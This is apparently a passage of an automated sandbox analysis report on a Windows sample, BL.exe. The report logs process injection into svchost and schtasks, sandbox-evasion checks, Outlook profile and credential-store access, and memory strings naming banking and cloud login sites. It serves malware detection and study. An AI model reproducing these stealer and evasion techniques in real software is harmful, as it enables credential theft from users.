            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\BL.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\schtasks.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: BL.exeStatic file information: File size 1313649 > 1048576
            Source: Binary string: schtasks.pdb source: svchost.exe, 00000002.00000003.2343149641.0000000002E49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2339549263.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, OmmtmfniIsg.exe, 00000003.00000003.2308910777.00000000008B4000.00000004.00000020.00020000.00000000.sdmp, OmmtmfniIsg.exe, 00000003.00000003.2308910777.000000000088B000.00000004.00000020.00020000.00000000.sdmp, OmmtmfniIsg.exe, 00000003.00000002.4643317474.00000000008B8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: OmmtmfniIsg.exe, 00000003.00000000.2294008987.000000000048E000.00000002.00000001.01000000.00000004.sdmp, OmmtmfniIsg.exe, 00000006.00000000.2452423712.000000000048E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: BL.exe, 00000000.00000003.2200803339.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, BL.exe, 00000000.00000003.2201628438.0000000004630000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2278099897.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2276121714.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2374651538.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2374651538.000000000359E000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000004.00000002.4646369641.0000000002E5E000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000004.00000002.4646369641.0000000002CC0000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000004.00000003.2381659246.000000000296E000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000004.00000003.2383829839.0000000002B14000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: BL.exe, 00000000.00000003.2200803339.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, BL.exe, 00000000.00000003.2201628438.0000000004630000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2278099897.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2276121714.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2374651538.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2374651538.000000000359E000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, schtasks.exe, 00000004.00000002.4646369641.0000000002E5E000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000004.00000002.4646369641.0000000002CC0000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000004.00000003.2381659246.000000000296E000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000004.00000003.2383829839.0000000002B14000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: schtasks.exe, 00000004.00000002.4648172740.00000000032EC000.00000004.10000000.00040000.00000000.sdmp, schtasks.exe, 00000004.00000002.4642699238.00000000026E3000.00000004.00000020.00020000.00000000.sdmp, OmmtmfniIsg.exe, 00000006.00000002.4645986744.00000000026CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2711959587.000000000FE0C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: schtasks.pdbGCTL source: svchost.exe, 00000002.00000003.2343149641.0000000002E49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2339549263.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, OmmtmfniIsg.exe, 00000003.00000003.2308910777.00000000008B4000.00000004.00000020.00020000.00000000.sdmp, OmmtmfniIsg.exe, 00000003.00000003.2308910777.000000000088B000.00000004.00000020.00020000.00000000.sdmp, OmmtmfniIsg.exe, 00000003.00000002.4643317474.00000000008B8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: schtasks.exe, 00000004.00000002.4648172740.00000000032EC000.00000004.10000000.00040000.00000000.sdmp, schtasks.exe, 00000004.00000002.4642699238.00000000026E3000.00000004.00000020.00020000.00000000.sdmp, OmmtmfniIsg.exe, 00000006.00000002.4645986744.00000000026CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2711959587.000000000FE0C000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_0040EB70 LoadLibraryA,GetProcAddress,0_2_0040EB70
            Source: BL.exeStatic PE information: real checksum: 0xa2135 should be: 0x148887
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_004171D1 push ecx; ret 0_2_004171E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401803 push ds; iretd 2_2_004017FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416033 pushfd ; ret 2_2_0041609B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00408199 pushad ; ret 2_2_004081C5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00415AF3 push eax; ret 2_2_00415B63
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041CAFD push ss; retf 2_2_0041CB05
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417AAE push FFFFFFD9h; ret 2_2_00417AB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004013E0 push ds; iretd 2_2_004017FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00413BEE push 0000003Ah; ret 2_2_00413C42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040CB98 push 7D3987A0h; iretd 2_2_0040CB9D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00413C43 push 0000003Ah; ret 2_2_00413C42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041E420 push ecx; iretd 2_2_0041E45E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00413C8A push ecx; iretd 2_2_00413DCC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00413D28 push edx; ret 2_2_00413D64
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00413D28 push ecx; iretd 2_2_00413DCC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00413DB0 push ecx; iretd 2_2_00413DCC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040668E push esi; retf 2_2_00406692
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402EA0 push eax; ret 2_2_00402EA2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041EEAC push es; ret 2_2_0041EEBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00413F34 push eax; retf 2_2_00413FB8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401786 push ds; iretd 2_2_004017FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00413FA5 push eax; retf 2_2_00413FB8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0340225F pushad ; ret 2_2_034027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034027FA pushad ; ret 2_2_034027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034309AD push ecx; mov dword ptr [esp], ecx2_2_034309B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0340283D push eax; iretd 2_2_03402858
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0340135E push eax; iretd 2_2_03401369
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exeCode function: 3_2_033003BA pushad ; ret 3_2_033003E6
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exeCode function: 3_2_0330E254 pushfd ; ret 3_2_0330E2BC
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exeCode function: 3_2_032FE8AF push esi; retf 3_2_032FE8B3
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exeCode function: 3_2_03316641 push ecx; iretd 3_2_0331667F

            Boot Survival

            barindex
            Uses schtasks.exe or at.exe to add and modify task schedules
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\SysWOW64\schtasks.exe"
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_004772DE IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_004772DE
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_004375B0
            Source: C:\Users\user\Desktop\BL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Contains functionality to detect sleep reduction / modifications
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_004440780_2_00444078
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\BL.exeAPI/Special instruction interceptor: Address: 3DDD23C
            Source: C:\Windows\SysWOW64\schtasks.exeAPI/Special instruction interceptor: Address: 7FFDB442D324
            Source: C:\Windows\SysWOW64\schtasks.exeAPI/Special instruction interceptor: Address: 7FFDB442D944
            Source: C:\Windows\SysWOW64\schtasks.exeAPI/Special instruction interceptor: Address: 7FFDB442D504
            Source: C:\Windows\SysWOW64\schtasks.exeAPI/Special instruction interceptor: Address: 7FFDB442D544
            Source: C:\Windows\SysWOW64\schtasks.exeAPI/Special instruction interceptor: Address: 7FFDB442D1E4
            Source: C:\Windows\SysWOW64\schtasks.exeAPI/Special instruction interceptor: Address: 7FFDB4430154
            Source: C:\Windows\SysWOW64\schtasks.exeAPI/Special instruction interceptor: Address: 7FFDB442DA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0347096E rdtsc 2_2_0347096E
            Source: C:\Windows\SysWOW64\schtasks.exeWindow / User API: threadDelayed 3422Jump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeWindow / User API: threadDelayed 6550Jump to behavior
            Source: C:\Users\user\Desktop\BL.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-86357
            Source: C:\Users\user\Desktop\BL.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_0-85083
            Source: C:\Users\user\Desktop\BL.exeAPI coverage: 3.1 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.6 %
            Source: C:\Windows\SysWOW64\schtasks.exeAPI coverage: 2.4 %
            Source: C:\Windows\SysWOW64\schtasks.exe TID: 516Thread sleep count: 3422 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exe TID: 516Thread sleep time: -6844000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exe TID: 516Thread sleep count: 6550 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exe TID: 516Thread sleep time: -13100000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe TID: 1600Thread sleep time: -85000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe TID: 1600Thread sleep count: 38 > 30Jump to behavior
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe TID: 1600Thread sleep time: -57000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe TID: 1600Thread sleep count: 45 > 30Jump to behavior
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe TID: 1600Thread sleep time: -45000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\schtasks.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452126
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_0045C999 FindFirstFileW,FindNextFileW,FindClose,0_2_0045C999
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose,0_2_00436ADE
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00434BEE
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_0045DD7C FindFirstFileW,FindClose,0_2_0045DD7C
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD29
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle,0_2_00436D2D
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442E1F
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00475FE5
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8D
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4_2_0044C310 FindFirstFileW,FindNextFileW,FindClose,4_2_0044C310
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_0040E470 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0040E470
            Source: 6222f67M.4.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
            Source: schtasks.exe, 00000004.00000002.4650522552.000000000777B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552M
            Source: 6222f67M.4.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
            Source: 6222f67M.4.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
            Source: 6222f67M.4.drBinary or memory string: discord.comVMware20,11696487552f
            Source: 6222f67M.4.drBinary or memory string: bankofamerica.comVMware20,11696487552x
            Source: schtasks.exe, 00000004.00000002.4650522552.000000000777B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,116964875c
            Source: 6222f67M.4.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
            Source: 6222f67M.4.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
            Source: 6222f67M.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
            Source: 6222f67M.4.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
            Source: 6222f67M.4.drBinary or memory string: global block list test formVMware20,11696487552
            Source: 6222f67M.4.drBinary or memory string: tasks.office.comVMware20,11696487552o
            Source: schtasks.exe, 00000004.00000002.4650522552.000000000777B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e365.comVMware20,11696487552t
            Source: 6222f67M.4.drBinary or memory string: AMC password management pageVMware20,11696487552
            Source: schtasks.exe, 00000004.00000002.4642699238.00000000026E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 6222f67M.4.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
            Source: 6222f67M.4.drBinary or memory string: interactivebrokers.comVMware20,11696487552
            Source: 6222f67M.4.drBinary or memory string: dev.azure.comVMware20,11696487552j
            Source: 6222f67M.4.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
            Source: schtasks.exe, 00000004.00000002.4650522552.000000000777B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: teractivebrokers.co.inVMware20,11696487552d
            Source: schtasks.exe, 00000004.00000002.4650522552.000000000777B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware20,11696487552}
            Source: 6222f67M.4.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
            Source: 6222f67M.4.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
            Source: 6222f67M.4.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
            Source: 6222f67M.4.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
            Source: firefox.exe, 00000009.00000002.2713247196.0000012B8FD8C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllLLi
            Source: 6222f67M.4.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
            Source: 6222f67M.4.drBinary or memory string: outlook.office365.comVMware20,11696487552t
            Source: 6222f67M.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
            Source: 6222f67M.4.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
            Source: 6222f67M.4.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
            Source: 6222f67M.4.drBinary or memory string: outlook.office.comVMware20,11696487552s
            Source: schtasks.exe, 00000004.00000002.4650522552.000000000777B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rdVMware20,11696487552x
            Source: 6222f67M.4.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
            Source: 6222f67M.4.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
            Source: 6222f67M.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
            Source: OmmtmfniIsg.exe, 00000006.00000002.4643838582.00000000007BF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll=
            Source: 6222f67M.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
            Source: 6222f67M.4.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
            Source: C:\Users\user\Desktop\BL.exeAPI call chain: ExitProcess graph end nodegraph_0-84933
            Source: C:\Users\user\Desktop\BL.exeAPI call chain: ExitProcess graph end nodegraph_0-85054
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0347096E rdtsc 2_2_0347096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004171B3 LdrLoadDll,2_2_004171B3
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_0045A259 BlockInput,0_2_0045A259
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_0040D6D0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D6D0
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_0040EB70 LoadLibraryA,GetProcAddress,0_2_0040EB70
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_03DDD508 mov eax, dword ptr fs:[00000030h]0_2_03DDD508
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_03DDD4A8 mov eax, dword ptr fs:[00000030h]0_2_03DDD4A8
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_03DDBE78 mov eax, dword ptr fs:[00000030h]0_2_03DDBE78
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h]2_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]2_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]2_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]2_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B035C mov ecx, dword ptr fs:[00000030h]2_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]2_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]2_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FA352 mov eax, dword ptr fs:[00000030h]2_2_034FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D8350 mov ecx, dword ptr fs:[00000030h]2_2_034D8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0350634F mov eax, dword ptr fs:[00000030h]2_2_0350634F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D437C mov eax, dword ptr fs:[00000030h]2_2_034D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A30B mov eax, dword ptr fs:[00000030h]2_2_0346A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A30B mov eax, dword ptr fs:[00000030h]2_2_0346A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A30B mov eax, dword ptr fs:[00000030h]2_2_0346A30B
